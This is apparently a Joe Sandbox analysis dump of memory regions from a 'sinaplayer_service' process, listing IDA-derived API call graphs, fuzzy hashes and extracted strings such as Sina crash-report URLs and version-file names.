• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$BasicFile@base@@MappedMemoryPiece@String$Append@D@2@@std@@D@2@@std@@@1@@DictionaryPathString@V01@V01@@V12@V34@@Value@base@@W@2@@std@@W@2@@std@@@Wide@base@@$??2@D@2@@std@@@2@@Exists@base@@Get@Initialize@Path@1@@Path@2@@Path@base@@@Read@Reader@base@@Service@@Value@2@
                                                                                                                                                                                                    • String ID: backup_ver$cur_ver
                                                                                                                                                                                                    • API String ID: 4130236664-3805504336
                                                                                                                                                                                                    • Opcode ID: 6da94db429e7fbb078aa22865beeb60445b7e565413966139024ad96b7352f8e
                                                                                                                                                                                                    • Instruction ID: 2345d104de5f46ebb7cc5adc74c016d575f5db9a7e31cac8446b688744cc970e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6da94db429e7fbb078aa22865beeb60445b7e565413966139024ad96b7352f8e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3B148B0D04258DFEF22DFA8C845BDEBBB5BF06304F1440A9D449A7282DB755A88CF52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(.Xl,.Xl,00000010,00000000,6C58028F,00000000), ref: 6C5AD17F
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD1DF
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD248
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::$atol
                                                                                                                                                                                                    • String ID: .$.$.Xl$NULL$`non-type-template-parameter$`template-parameter
                                                                                                                                                                                                    • API String ID: 2083219425-3499164713
                                                                                                                                                                                                    • Opcode ID: fe70d55782e9016af4f972b06d184060e495200003c97e87d4ebc17b54e5444f
                                                                                                                                                                                                    • Instruction ID: dba557069d5f99e3409513d3682266d0ca1cb3dfb72465f8a35fcda3cf41818b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe70d55782e9016af4f972b06d184060e495200003c97e87d4ebc17b54e5444f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3710771906258DEEB20EBB5CC94FEDB778AF91308F50045AE405A7A80DF749E8DCB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00379BAE
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00379BD1
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00379C0B
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,?,?), ref: 00379F5C
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F7,?), ref: 00379F72
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?CreateFileVersionInfo@FileVersionInfo@@SAPAV1@ABVFilePath@base@@@Z.BASE(?), ref: 00379F87
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,00000000), ref: 00379FB1
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FCF
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FF2
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??1FilePath@base@@QAE@XZ.BASE ref: 0037A014
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,?,?), ref: 0037A05A
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A073
                                                                                                                                                                                                    • ?Now@Time@base@@SA?AV12@XZ.BASE(?), ref: 00379C41
                                                                                                                                                                                                    • ?ToDoubleT@Time@base@@QBENXZ.BASE ref: 00379C4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                      • Part of subcall function 00376260: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                      • Part of subcall function 00376260: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                      • Part of subcall function 00376260: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                      • Part of subcall function 00376260: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 00376305
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376327
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00376332
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037635C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 0037636D
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376392
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 0037639D
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 003763C9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00379CAD
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,?,?,?), ref: 0037B165
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000,?,?,?), ref: 0037B189
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?), ref: 0037B1C3
                                                                                                                                                                                                      • Part of subcall function 0037B110: GetCurrentThreadId.KERNEL32 ref: 0037B1FE
                                                                                                                                                                                                      • Part of subcall function 0037B110: GetTickCount.KERNEL32 ref: 0037B224
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?), ref: 0037B23D
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?), ref: 0037B260
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?), ref: 0037B271
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B294
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,?), ref: 00379CDD
                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,00000000,00000000,?), ref: 00379CFA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000), ref: 00379D5D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379DB2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00379DDE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00379E41
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379E4D
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379E56
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=, xrefs: 00379D7E
                                                                                                                                                                                                    • http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=, xrefs: 00379C79
                                                                                                                                                                                                    • &appVersion=, xrefs: 00379C6D, 00379D6C
                                                                                                                                                                                                    • &timestamp=, xrefs: 00379C67, 00379D66
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$V01@$??3@??6?$basic_ostream@File$?sputc@?$basic_streambuf@U?$char_traits@_$D@std@@V?$allocator@V?$basic_string@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@Path@base@@Path@base@@@Time@base@@Version$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?clear@?$basic_ios@Base64BasicCountCreateCurrentD@2@@std@@D@2@@std@@@D@2@@std@@@1@DoubleEncode@base@@F8@base@@Get@Info@Info@@Now@PathPiece@Service@@StringThreadTickV01@@V12@V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide
                                                                                                                                                                                                    • String ID: &appVersion=$&timestamp=$http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=$http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
                                                                                                                                                                                                    • API String ID: 1063858033-840303552
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374337
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037435A
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374394
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003743D1
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003743F1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037440E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00374431
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00374442
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00374452
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037445D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00374465
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00374486
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickU?$char_traits@_V01@@V01@_V?$basic_ostream@W@std@@@std@@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $5$ApnsHTTP.cpp$RequestGet bret =
                                                                                                                                                                                                    • API String ID: 2161555721-3294862416
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374521
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00374544
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037457E
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003745C0
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003745DD
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003745FD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037461A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037463D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037464E
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037465E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00374672
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003746A2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
